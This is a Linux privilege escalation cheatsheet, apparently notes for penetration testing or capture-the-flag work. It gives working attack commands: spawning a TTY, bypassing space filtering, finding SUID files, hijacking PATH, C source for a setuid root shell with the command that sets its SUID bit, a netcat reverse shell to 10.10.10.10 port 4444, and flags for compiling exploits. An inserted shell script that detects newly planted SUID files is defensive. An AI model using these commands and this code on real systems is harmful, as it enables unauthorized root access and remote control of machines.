Linux Privilege Escalation Cheatsheet

Spawn TTY Shell with Python

python -c 'import pty; pty.spawn("/bin/sh")'

Call list of available shells

cat /etc/shells

This matters because some exploits have to be adapted to work with, or without, a particular shell.

Execute shell commands when spaces are filtered

For example, when I executed ls -lia I got:

[image: error output]

So to execute something like ls -lia you can send:

{ls,-lia}


Searching for all SUID files

find / -perm -u=s -type f 2>/dev/null

Create a symlink

ln -s /path/to/file /path/to/symlink

Add current directory to PATH variable

export PATH=.:$PATH

Suid file to spawn root shell

#include <stdio.h>
#include <stdlib.h>     /* system() */
#include <sys/types.h>
#include <unistd.h>     /* setuid(), setgid() */

int main(void)
{
    setuid(0);          /* only succeeds when the binary is root-owned with the SUID bit set */
    setgid(0);
    system("/bin/bash");
    return 0;
}

Add suid bit to C shell file

cp /tmp/shell /home/admin/shell
chmod +s /home/admin/shell
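As an added defender-side counterpart to the "Searching for all SUID files" and "Add suid bit" entries above (example code, not part of the original cheatsheet): the same find expression turned into a baseline audit that reports setuid/setgid files that appeared since the last run, such as a copied shell that was later given the SUID bit. The demo runs on a constructed temporary directory so it never has to scan /.

```shell
#!/bin/sh
# Added example: audit setuid/setgid regular files under ROOT against a
# saved baseline and print anything new. Run it from cron or a file-integrity
# job; an unexpected SUID binary (e.g. a root-owned copy of bash or a custom
# setuid(0) wrapper) is a strong indicator of a persistence or escalation step.

# list_suid ROOT -> sorted list of setuid/setgid regular files under ROOT
list_suid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# suid_new ROOT BASELINE -> paths present now but absent from BASELINE
# (BASELINE must be a sorted list, i.e. earlier output of list_suid)
suid_new() {
    list_suid "$1" | comm -13 "$2" -
}

# demo: builds a constructed tree (hypothetical paths) with one "known" SUID
# file, records the baseline, then plants a SUID copy of a shell the way the
# cheatsheet describes and prints what the audit flags, relative to the tree.
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/bin" "$tmp/home/admin"
    : > "$tmp/bin/passwd"
    chmod 4755 "$tmp/bin/passwd"              # expected SUID file, goes into baseline
    list_suid "$tmp" > "$tmp/baseline.txt"
    : > "$tmp/home/admin/shell"
    chmod u+s "$tmp/home/admin/shell"         # the cheatsheet's chmod +s step
    suid_new "$tmp" "$tmp/baseline.txt" | sed "s|^$tmp||"
    rm -rf "$tmp"
}

demo    # prints /home/admin/shell
```

On a real host, save list_suid / > /var/lib/suid.baseline once from a known-good state and run suid_new / /var/lib/suid.baseline on a schedule, alerting on any output.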

Netcat reverse shell when the '-e' or '-c' options are unavailable

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 4444 >/tmp/f

Compile an exploit for an older glibc

gcc exploit.c -m32 -o exploit -Wl,--hash-style=both

RedHat ifconfig alternative

cat /etc/sysconfig/network-scripts/ifcfg-eth0

MySQL privilege escalation technique

Nicely described here

Resources

Kernel-exploits.com
Basic Linux Privilege Escalation - a huge guide by g0tmi1k